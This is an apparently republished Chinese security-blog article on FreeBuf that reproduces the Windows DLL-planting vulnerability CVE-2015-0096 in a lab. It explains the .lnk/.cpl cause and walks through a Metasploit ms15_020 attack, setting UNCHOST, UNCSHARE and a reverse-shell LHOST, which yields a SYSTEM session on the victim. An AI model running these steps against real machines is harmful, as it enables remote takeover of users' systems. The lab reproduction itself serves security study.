freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Microsoft DLL植入远程代码执行漏洞(CVE-2015-0096)
2019-01-17 09:47:47

漏洞成因

    Microsoft Windows没有正确处理DLL文件的加载,存在远程代码执行漏洞,通过诱使用户打开远程WebDAV或SMB共享上的某些文件利用此漏洞,成功利用后可导致加载任意库。Windows使用.lnk来定义文件或者目录的快捷方式,可以使用.CPL文件来自定义图标。问题是,在Windows中,图标从模块(或者可执行文件或动态链接库)加载。事实上,.cpl文件实际上是DLL文件。因为攻击者可以定义哪些可执行模块会被加载,攻击者可以利用.LNK文件来执行任意代码。

漏洞环境

入侵主机linux:192.168.1.125

共享文件主机win7:192.168.1.102

受害者主机win7:192.168.1.109

漏洞复现

准备好两台Windows7的主机环境,搭建好一个,直接拷贝速度更快。

图片.png克隆一份Windows7:

图片.png在一台win7主机上的C盘中创建share文件夹,并进行共享。

图片.png在第二台主机上查看是否共享成功。

图片.png共享成功后,所需要的环境条件就以达成,接下来使用攻击机器kali Linux进行攻击。所使用工具为msf。

图片.png搜索相关漏洞:ms15_020

图片.png利用相关漏洞模块:

图片.png设置一个反弹shell:

图片.png查看需要设置的参数:

图片.png设置好参数,设置漏洞利用模块列表的UNCHOST和UNCSHARE

set UNCHOST 192.168.1.102

设置为文件共享主机地址

set UNCSHARE share

设置共享文件的文件夹,这里主机192.168.1.102在C盘下的share里文件夹开启了共享,提前创建好共享

set LHOST 192.168.1.125

设置漏洞成功利用后后门连接的地址

图片.pngExploit

执行漏洞

图片.png生成了几个文件,我们去生成的目录下把文件拷贝到共享主机的共享文件夹下:

图片.png可能会提示如下:图片.png

利用重命名解决问题,记得改回。

图片.png受害者访问共享后,成功了触发了漏洞。

图片.png可以发现入侵者这边弹回来了一个回话session 1

图片.png图片.png成功获取到系统权限。



# 漏洞复现
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者